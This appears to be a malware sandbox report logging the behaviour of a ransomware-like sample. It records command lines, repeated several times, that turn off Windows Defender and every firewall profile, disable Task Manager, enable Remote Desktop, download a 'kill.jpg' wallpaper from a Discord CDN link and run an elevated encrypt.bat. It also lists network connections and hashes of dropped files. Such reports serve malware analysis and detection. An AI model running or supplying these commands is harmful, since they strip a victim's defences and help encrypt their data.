reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

Network

Country Destination Domain Proto
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 233.130.159.162.in-addr.arpa udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 161.19.199.152.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
NL 23.62.61.97:443 www.bing.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp
US 8.8.8.8:53 181.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 66.229.138.52.in-addr.arpa udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 233.135.159.162.in-addr.arpa udp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
NL 52.142.223.178:80 tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 233.129.159.162.in-addr.arpa udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI21962\python312.dll

MD5 3c388ce47c0d9117d2a50b3fa5ac981d
SHA1 038484ff7460d03d1d36c23f0de4874cbaea2c48
SHA256 c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb
SHA512 e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35

C:\Users\Admin\AppData\Local\Temp\_MEI21962\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

C:\Users\Admin\AppData\Local\Temp\_MEI21962\base_library.zip

MD5 08332a62eb782d03b959ba64013ac5bc
SHA1 b70b6ae91f1bded398ca3f62e883ae75e9966041
SHA256 8584f0eb44456a275e3bc69626e3acad595546fd78de21a946b2eb7d6ba02288
SHA512 a58e4a096d3ce738f6f93477c9a73ddbfcb4b82d212c0a19c0cf9e07f1e62b2f477a5dd468cd31cc5a13a73b93fa17f64d6b516afef2c56d38ede1ace35cf087

\Users\Admin\AppData\Local\Temp\_MEI21962\python3.dll

MD5 79b02450d6ca4852165036c8d4eaed1f
SHA1 ce9ff1b302426d4c94a2d3ea81531d3cb9e583e4
SHA256 d2e348e615a5d3b08b0bac29b91f79b32f0c1d0be48976450042462466b51123
SHA512 47044d18db3a4dd58a93b43034f4fafa66821d157dcfefb85fca2122795f4591dc69a82eb2e0ebd9183075184368850e4caf9c9fea0cfe6f766c73a60ffdf416

\Users\Admin\AppData\Local\Temp\_MEI21962\_ctypes.pyd

MD5 bbd5533fc875a4a075097a7c6aba865e
SHA1 ab91e62c6d02d211a1c0683cb6c5b0bdd17cbf00
SHA256 be9828a877e412b48d75addc4553d2d2a60ae762a3551f9731b50cae7d65b570
SHA512 23ef351941f459dee7ed2cebbae21969e97b61c0d877cfe15e401c36369d2a2491ca886be789b1a0c5066d6a8835fd06db28b5b28fb6e9df84c2d0b0d8e9850e

\Users\Admin\AppData\Local\Temp\_MEI21962\libffi-8.dll

MD5 0f8e4992ca92baaf54cc0b43aaccce21
SHA1 c7300975df267b1d6adcbac0ac93fd7b1ab49bd2
SHA256 eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
SHA512 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

C:\Users\Admin\AppData\Local\Temp\_MEI21962\_socket.pyd

MD5 dc06f8d5508be059eae9e29d5ba7e9ec
SHA1 d666c88979075d3b0c6fd3be7c595e83e0cb4e82
SHA256 7daff6aa3851a913ed97995702a5dfb8a27cb7cf00fb496597be777228d7564a
SHA512 57eb36bc1e9be20c85c34b0a535b2349cb13405d60e752016e23603c4648939f1150e4dbebc01ec7b43eb1a6947c182ccb8a806e7e72167ad2e9d98d1fd94ab3

C:\Users\Admin\AppData\Local\Temp\_MEI21962\_lzma.pyd

MD5 05e8b2c429aff98b3ae6adc842fb56a3
SHA1 834ddbced68db4fe17c283ab63b2faa2e4163824
SHA256 a6e2a5bb7a33ad9054f178786a031a46ea560faeef1fb96259331500aae9154c
SHA512 badeb99795b89bc7c1f0c36becc7a0b2ce99ecfd6f6bb493bda24b8e57e6712e23f4c509c96a28bc05200910beddc9f1536416bbc922331cae698e813cbb50b3

C:\Users\Admin\AppData\Local\Temp\_MEI21962\_hashlib.pyd

MD5 eedb6d834d96a3dffffb1f65b5f7e5be
SHA1 ed6735cfdd0d1ec21c7568a9923eb377e54b308d
SHA256 79c4cde23397b9a35b54a3c2298b3c7a844454f4387cb0693f15e4facd227dd2
SHA512 527bd7bb2f4031416762595f4ce24cbc6254a50eaf2cc160b930950c4f2b3f5e245a486972148c535f8cd80c78ec6fa8c9a062085d60db8f23d4b21e8ae4c0ad

C:\Users\Admin\AppData\Local\Temp\_MEI21962\_decimal.pyd

MD5 3055edf761508190b576e9bf904003aa
SHA1 f0dc8d882b5cd7955cc6dfc8f9834f70a83c7890
SHA256 e4104e47399d3f635a14d649f61250e9fd37f7e65c81ffe11f099923f8532577
SHA512 87538fe20bd2c1150a8fefd0478ffd32e2a9c59d22290464bf5dfb917f6ac7ec874f8b1c70d643a4dc3dd32cbe17e7ea40c0be3ea9dd07039d94ab316f752248

C:\Users\Admin\AppData\Local\Temp\_MEI21962\_cffi_backend.cp312-win_amd64.pyd

MD5 0572b13646141d0b1a5718e35549577c
SHA1 eeb40363c1f456c1c612d3c7e4923210eae4cdf7
